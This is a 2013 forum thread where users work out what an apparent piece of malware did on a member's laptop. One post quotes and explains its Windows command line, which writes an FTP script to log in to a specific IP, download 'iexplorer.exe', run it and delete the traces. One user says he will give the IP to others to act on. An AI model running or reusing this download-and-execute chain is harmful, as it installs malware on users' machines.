Author Topic: Uhm, virus? Help? (Read 10537 times)

Lando The Climber² · February 03, 2013, 10:42:31 PM

Quote from: Trymos on February 03, 2013, 10:40:28 PM

2 idiots here.

there's a FTP IP that has relations to a virus.

and the first thing you guys do is try to connect to it using your MAIN COMPUTER?

*facepalm*

i got a laptop with ubuntu 11.04 and a 2000 vm all set up and therefore the pc is immune to this virus.

by the way, from what i can tell this virus is supposed to spread and only spread.

it uploads itself to ftp servers whenever possible.

it exploits network vulnerabilities to other computers on the network.

and finally it spreads itself on irc.

not sure what else it's supposed to do by then.
chances are, since it's connecting to a ftp server constantly: you're part of a botnet.

I disconnected as soon as I connected, I didn't even login yet. Nothing can happen before you login.

Ad Bot · Advertisement

mp7964 · February 03, 2013, 10:44:12 PM

Quote from: Trymos on February 03, 2013, 10:40:28 PM

2 idiots here.

there's a FTP IP that has relations to a virus.

and the first thing you guys do is try to connect to it using your MAIN COMPUTER?

*facepalm*

i got a laptop with ubuntu 11.04 and a 2000 vm all set up and therefore the pc is immune to this virus.

by the way, from what i can tell this virus is supposed to spread and only spread.

it uploads itself to ftp servers whenever possible.

it exploits network vulnerabilities to other computers on the network.

and finally it spreads itself on irc.

not sure what else it's supposed to do by then.
chances are, since it's connecting to a ftp server constantly: you're part of a botnet.

No need to be an starfish. Like I knew what it was supposed to do, I was curious. This isn't my main computer anyway. I'm running wireshark, and I don't have any ftp connections atm. Like Lando said, disconnected as soon as it started talking about POST.

Evar678 · February 03, 2013, 11:01:48 PM

So before I get off my tablet, i should mention

I'm fairly positive that this virus thing never got to enter this into cmd.exe, nor ever connect to the ftp. My laptop hasn't been left unattended unless notepad was up, and if it was i turn my wireless adapter off.

Fairly sure that, besides attempting to connect, no other damage has been done.

Stocking · February 03, 2013, 11:37:52 PM

Quote from: Evar678 on February 03, 2013, 11:01:48 PM

So before I get off my tablet, i should mention

I'm fairly positive that this virus thing never got to enter this into cmd.exe, nor ever connect to the ftp. My laptop hasn't been left unattended unless notepad was up, and if it was i turn my wireless adapter off.

Fairly sure that, besides attempting to connect, no other damage has been done.

maybe its an aimbot. boot up CS:GO and see if youre any good all of the sudden

Perlin Noise · February 03, 2013, 11:53:12 PM

he didn't use a proxy
brb lolling self
ill give that IP to some people and see what they do.

Evar678 · February 04, 2013, 06:52:27 AM

Well, left laptop on all night, I think that this problem is gone. After uninstalling VNC, I haven't had the virus type anything so far.

Port · February 04, 2013, 07:02:56 AM

I didn't read all pages so I don't know if anybody already said this, but here's what, according to the text in the OP, is going on.

What is happening is that some program is trying to download a file named "iexplorer.exe" to your \Windows\system32\ folder and then run it.
However, it's doing this by sending keystrokes directly which should run as cmd commands.
Basically, it seems to fail to open command prompt initially.

start %systemroot%\system32\cmd.exe

A strange way of getting to \Windows\system32 in command prompt.

del eq&echo open 181.166.154.188 7191 >> eq&echo user 16446 10097 >> eq &echo get iexplorer.exe >> eq &echo quit >> eq

If the file eq exists, delete it.
Writes this to a file named eq:

Code: [Select]

open 181.166.154.188 7191 - connect to some strange FTP server somewhere
user 16446 10097 - login to the FTP server
get iexplorer.exe - download the file iexplorer.exe
quit - exit the FTP client

ftp -n -s:eq

Open Windows' default command line FTP client and execute the commands in the eq file.

iexplorer.exe

Open the downloaded file.

del eq

Delete the file eq (to remove traces?).

Doomonkey · February 04, 2013, 09:06:56 AM

I never got that part of the code. It uses command prompt to open command prompt.

ShadowsfeaR · February 04, 2013, 09:14:08 AM

Quote from: Doomonkey on February 04, 2013, 09:06:56 AM

I never got that part of the code. It uses command prompt to open command prompt.

Worst virus 2012

Stocking · February 04, 2013, 09:17:16 AM

Quote from: Doomonkey on February 04, 2013, 09:06:56 AM

I never got that part of the code. It uses command prompt to open command prompt.

Therea probably other viruses it neeza to work. Once they're all downloaded it instantly wins your computer like Exodia

Gojira · February 04, 2013, 09:17:33 AM

Quote from: ShadowsfeaR on February 04, 2013, 09:14:08 AM

Worst virus 2012

2013*

Trymos · February 04, 2013, 09:43:49 AM

Quote from: Gojira on February 04, 2013, 09:17:33 AM

2013*

All time*

Perlin Noise · February 04, 2013, 03:47:38 PM

so basically he swapped your default iexplorer.exe with some virus that probably adds you to a botnet.

Zeblote · February 04, 2013, 04:54:59 PM

What exactly is a botnet?

Jaxx · February 04, 2013, 05:14:40 PM

network of computers, essentially acting as unwilling sleeper cells, most often times mobilized for ddos attacks on popular targets or otherwise.